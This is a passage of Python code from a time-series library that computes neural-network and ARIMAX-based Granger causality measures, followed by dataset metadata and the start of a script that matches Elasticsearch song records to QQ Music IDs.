elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
if type(w1) is int:
if w1<=0:
raise ValueError('w1 should be grater than 0')
else:
raise ValueError('w1 should be an integer')
if type(w2) is int:
if w2<=0:
raise ValueError('w2 should be grater than 0')
else:
raise ValueError('w2 should be an integer')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing time series, which will be examin in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityLSTM(xx, maxlag, LSTM_layers, LSTM_neurons, run, Dense_layers, Dense_neurons, xxtest, z, ztest, add_Dropout, Dropout_rate, epochs_num, learning_rate, batch_size_num, verbose, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict() # value of causality
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xxtest[lag:,0] # signal, that will be forecasting
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for k in range(xtest.shape[0]-lag):
dataXtest[k,:]=xtest[k:k+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test testing data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:] = xztest[k:k+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(0,T,w2)): # counting value of causality starting from moment w1 with step equal to w2 till the end of time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX_res, res],['measure of change of causality', 'measure of causality for whole signal','numbers of samples at the end of the step','results from nonlincausalityLSTM function'])
return results
#%% Measure GRU
def nonlincausalitymeasureGRU(x, maxlag, w1, w2, GRU_layers, GRU_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function is using modified Granger causality test to examin mutual causality in 2 or more time series.
It is using nonlincausalityGRU function for creating prediction models.
A measure of causality is derived from these models asa sigmoid fuction
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
Where
RMSE1 is root mean square error obtained from model using only past of X to predict X.
RMSE2 is root mean square error obtained from model using past of X and Y to predict X.
RMSE is counted from w1 moments of time series with a step equal to w2.
This function is counting mutual causality for every pair of time series contained in columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - number of samples, which are taken to count RMSE in measure of causality.
w2 - number of sample steps for counting RMSE in measure of causality.
GRU_layers - int, number of GRU layers in the model.
GRU_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of GRU layers specified in GRU_layers. The First GRU layer has the number of neurons equal to the first element in GRU_neurns,
the second layer has the number of neurons equal to the second element in GRU_neurons and so on.
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, than Dropout layer is added after each GRU and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityGRU() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
if type(w1) is int:
if w1<=0:
raise ValueError('w1 should be grater than 0')
else:
raise ValueError('w1 should be an integer')
if type(w2) is int:
if w2<=0:
raise ValueError('w2 should be grater than 0')
else:
raise ValueError('w2 should be an integer')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing time series, which will be examin in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityGRU(xx, maxlag, GRU_layers, GRU_neurons, run, Dense_layers, Dense_neurons, xxtest, z, ztest, add_Dropout, Dropout_rate, epochs_num, learning_rate, batch_size_num, verbose, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xxtest[lag:,0] # signal, that will be forecasting
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for k in range(xtest.shape[0]-lag):
dataXtest[k,:]=xtest[k:k+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test testing data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:] = xztest[k:k+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(0,T,w2)): # counting value of causality starting from moment w1 with step equal to w2 till the end of time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX_res, res],['measure of causality with sigmid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityGRU function'])
return results
#%% Measure NN
def nonlincausalitymeasureNN(x, maxlag, w1, w2, NN_config, NN_neurons, run=1, xtest=[], z=[], ztest=[], epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function is using modified Granger causality test to examin mutual causality in 2 or more time series.
It is using nonlincausalityNN function for creating prediction models.
A measure of causality is derived from these models asa sigmoid fuction
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
Where
RMSE1 is root mean square error obtained from model using only past of X to predict X.
RMSE2 is root mean square error obtained from model using past of X and Y to predict X.
RMSE is counted from w1 moments of time series with a step equal to w2.
This function is counting mutual causality for every pair of time series contained in columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - number of samples, which are taken to count RMSE in measure of causality.
w2 - number of sample steps for counting RMSE in measure of causality.
NN_config - list, tuple or numpy ndarray. Specified subsequent layers of the neural network. List should contain only 'd', 'l', 'g' or 'dr':
'd' - Dense layer
'l' - LSTM layer
'g' - GRU layer
'dr' - Dropout layer
NN_neurons - list, tuple or numpy ndarray, where the number of elements should be equal to the number of layers in NN_config. Each value corresponds to the number of neurons in layers for Danse, LSTM and GRU layer and the rate for Dropout layer.
E.g. if NN_config = ['l','dr','d'] and NN_neurons = [100, 0.1, 30], than first layer is LSTM layer with 100 neurons, than is Dropout layer with rate 0.1 and after it is Dense layer with 30 neurons.
Always last layer is Dense layer with one neuron and linear activation function.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityNN() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]):
for j in range(x.shape[1]):
if i==j:
continue
else:
xx[:,0] = x[:,i] # Choosing time series, which will be examin in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(j)+'->'+str(i))
res = nonlincausalityNN(xx, maxlag, NN_config, NN_neurons, run, xxtest, z, ztest, epochs_num, learning_rate, batch_size_num, verbose, plot)
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags:
idx_bestX = res[lag][0][-4]
idx_bestXY = res[lag][0][-3]
modelsX = res[lag][0][1]
modelsXY = res[lag][0][2]
modelX = modelsX[idx_bestX]
modelXY = modelsXY[idx_bestXY]
X = xxtest[lag:,0] # signal, that will be forecasting
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest[:,0].reshape(xxtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xxtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for k in range(xxtest.shape[0]-lag):
dataXtest[k,:]=xxtest[k:k+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test testing data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest),axis=1)
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXYtest = np.zeros([xxtest.shape[0]-lag,lag,2]) # input matrix for testing the model with data from X and Y time series
for k in range(xxtest.shape[0]-lag):
dataXYtest[k,:,:]=xxtest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
#dataXYtest = dataXYtest.reshape(dataXYtest.shape[0],dataXYtest.shape[1],2) # reshaping the data to meet the requirements of the model
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(0,T,w2)): # counting value of causality starting from moment w1 with step equal to w2 till the end of time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(j)+'->'+str(i)] = ([VC_res, VC2_res, VCX_res, res],['measure of causality with sigmid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityNN function'])
return results
#%% Measure ARIMAX
def nonlincausalitymeasureARIMAX(x, maxlag, w1, w2, d, xtest=[], z=[], ztest=[], verbose=True, plot = False, plot_res = False, plot_with_x = False):
'''
This function is using a modified Granger causality test to examine mutual causality in 2 or more time series.
It is using nonlincausalityARIMAX function for creating prediction models.
A measure of causality is derived from these models as a sigmoid function
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
Where
RMSE1 is the root mean square error obtained from the model using only the past of X to predict X.
RMSE2 is the root mean square error obtained from the model using the past of X and Y to predict X.
RMSE is counted from w1 moments of time series with a step equal to w2.
This function is counting mutual causality for every pair of time series contained in columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - number of samples, which are taken to count RMSE in measure of causality.
w2 - number of sample steps for counting RMSE in measure of causality.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_x - boolean, if True data from x are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityARIMAX() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
xx = np.zeros([x.shape[0],2])
results = dict()
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing time series, which will be examin in this iteration
xx[:,1] = x[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityARIMAX(xx, maxlag, d, xtest, z, ztest, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xx[:,0]
XpredX = modelX.predict(typ='levels') # predicted values
XYpredX = modelXY.predict(typ='levels')
errorX = X[1:]-XpredX
errorXY = X[1:]-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(w1,T,w2)): # counting value of causality starting from moment w1 with step equal to w2 till the end of time series
VC[n] = 2/(1 + math.exp(-(math.sqrt(statistics.mean(errorX[k-w1:k]**2))/math.sqrt(statistics.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + math.exp(-(math.sqrt(statistics.mean(errorX[-w1:]**2))/math.sqrt(statistics.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+'_'+ str(min([i,j]))+' and ' + str(max([i,j])) +' sigmoid function of quotient of errors')
plt.plot(VCX, VC)
if j<i and plot_with_x:
plt.plot(range(0,T),xx[0:,0],range(0,T),xx[0:,1])
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = math.log(statistics.variance(errorX)/statistics.variance(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX, res],['measure of causality with sigmid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityARIMAX function'])
return results | 57.058261 | 302 | 0.611556 | 18,937 | 131,234 | 4.186038 | 0.027143 | 0.018569 | 0.00492 | 0.013851 | 0.939347 | 0.93063 | 0.921825 | 0.915745 | 0.912881 | 0.90588 | 0 | 0.011258 | 0.296105 | 131,234 | 2,300 | 303 | 57.058261 | 0.846885 | 0.326798 | 0 | 0.863362 | 0 | 0.00067 | 0.167943 | 0.000249 | 0 | 0 | 0 | 0.000435 | 0 | 1 | 0.005358 | false | 0 | 0.006698 | 0 | 0.017415 | 0.009377 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6261c8cccefc46cd3326231f28bd7e62da3de91 | 4,780 | py | Python | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | from luoo_init.utils.qqmusic import QQMusicAPI
from elasticsearch import Elasticsearch
client = Elasticsearch(hosts=['144.34.156.145'], timeout=20)
def insert_qq(gte, lte, max_tries=5):
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
for i in range(len(pieces)):
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
qq_id, qq_sim = api.get_id(title, artist, album, if_check=True)
pieces[i]['qq_id'] = qq_id
pieces[i]['qq_sim'] = qq_sim
print('%s %s %s: %s %s' % (title, album, artist, api.get_page_url(qq_id), qq_sim))
tries = 0
while True:
try:
client.update(
index='luoo1',
id=obj_id,
body={'doc': {'pieces': pieces}}
)
break
except Exception as e:
tries += 1
if tries == max_tries:
raise e
def insert_qq_again(gte, lte, max_tries=5):
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
count = 0
for i in range(len(pieces)):
if pieces[i].get('qq_sim', 0) >= 0.75:
continue
if pieces[i].get('ne_sim', 0) >= 0.75:
continue
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
qq_id, qq_sim = api.get_id(title, artist, album, if_check=True)
if qq_sim > pieces[i].get('qq_sim', 0):
pieces[i]['qq_id'] = qq_id
pieces[i]['qq_sim'] = qq_sim
print('%s %s %s: %s %s' % (title, album, artist, api.get_page_url(qq_id), qq_sim))
count += 1
if not count:
continue
tries = 0
while True:
try:
client.update(
index='luoo1',
id=obj_id,
body={'doc': {'pieces': pieces}}
)
break
except Exception as e:
tries += 1
if tries == max_tries:
raise e
def miss_stat(gte, lte):
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
